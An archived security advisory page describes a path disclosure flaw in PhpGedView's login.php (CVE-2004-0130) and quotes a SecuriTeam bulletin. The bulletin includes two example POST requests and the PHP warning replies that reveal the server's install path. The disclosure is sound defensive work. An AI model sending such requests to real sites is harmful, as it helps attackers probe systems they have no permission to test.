SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PhpGedView Vendors:   phpgedview.sourceforge.net
PhpGedView 'login.php' Discloses Installation Path to Remote Users
SecurityTracker Alert ID:  1008844
SecurityTracker URL:  http://securitytracker.com/id/1008844
CVE Reference:   CVE-2004-0130   (Links to External Site)
Updated:  Feb 4 2004
Original Entry Date:  Jan 26 2004
Impact:   Disclosure of system information, Disclosure of user information
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.65 and prior versions
Description:   An information disclosure vulnerability was reported in PhpGedView. A remote user can determine the installation path.

SecuriTeam posted a report credited to Cedric Cochin regarding a flaw in 'login.php' that allows a remote user to determine the installation path.

A remote user can submit a POST request without the username and password variables to cause the system to display the installation path. A remote authenticated user can also submit a POST request that is missing the 'usertime' variable to view the installation path.

Impact:   A remote user or a remote authenticated user can determine the installation path.
Solution:   No solution was available at the time of this entry. The vendor reportedly plans to issue a fix shortly in version 2.65.2.
Vendor URL:  phpgedview.sourceforge.net/ (Links to External Site)
Cause:   Access control error, Exception handling error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [UNIX] PhpGedView Path Disclosure Vulnerability


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  PhpGedView Path Disclosure Vulnerability
------------------------------------------------------------------------


SUMMARY

 <http://phpGedView.sourceforge.net> phpGedView is an open source system 
for online viewing of Gedcom information (family tree and genology 
information).
A security problem in the product allows attackers to gather the true path 
of the server-side script.

DETAILS

Vulnerable Systems:
 * phpGedView version 2.65 and prior

The login.php script is not testing if a variable which is supposed to be 
POSTed has been defined before using it.

Example:

I - Path disclosure

-- HTTP Client Request --

http://target/phpGedView/login.php POST DATA: action=login

-- HTTP Client Request --

Username  and  password are  missing  and will  generate  an PHP  error  
message
displaying the Real Path.

-- HTTP Server Reply --

< br /> < b>Warning< /b>:  Undefined index:  username in
< b>/var/www/phpGedView/login.php< /b> on line < b>36< /b>< br /> < br />
< b>Warning< /b>:  Undefined index:  password in
< b>/var/www/phpGedView/login.php< /b> on line < b>36< /b>< br /> < br />
< b>Warning< /b>:  Cannot add header information - headers already sent by 
(output
started at /var/www/phpGedView/login.php:36) in
< b>/var/www/phpGedView/functions_print.php< /b> on line < b>492< /b>< br 
/>

-- HTTP Server Reply --

                  -------------------------------------------

II - Path disclosure with a valid user account

-- HTTP Client Request --

http://target/phpGedView/login.php POST DATA:
action=login&url=editconfig.php&usertime=&username=admin&password=login

-- HTTP Client Request --

Username/password  must be  a valid  couple. The  usertime is  missing and 
 will
generate an PHP error message displaying the Real Path.

-- HTTP Server Reply --

< br /> < b>Warning< /b>:  strtotime() called with empty time parameter in
< b>/var/www/phpGedView/login.php< /b> on line < b>39< /b>< br< br /> < 
b>Warning< /b>:
Cannot add header information - headers already sent by (output started at
/var/www/phpGedView/login.php:39) in < b>/var/www/phpGedView/login.php< 
/b> on
line < b>44< /b>< br />  />

-- HTTP Server Reply --

Vendor Status:
The vendor has been notified and a release version 2.65.2 with fixes for 
all the above mentioned vulnerabilities will be available soon.


ADDITIONAL INFORMATION

The information has been provided by  <mailto:cco@netvigilance.com> Cedric 
Cochin



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any kind. 
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business
 profits or special damages. 





 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC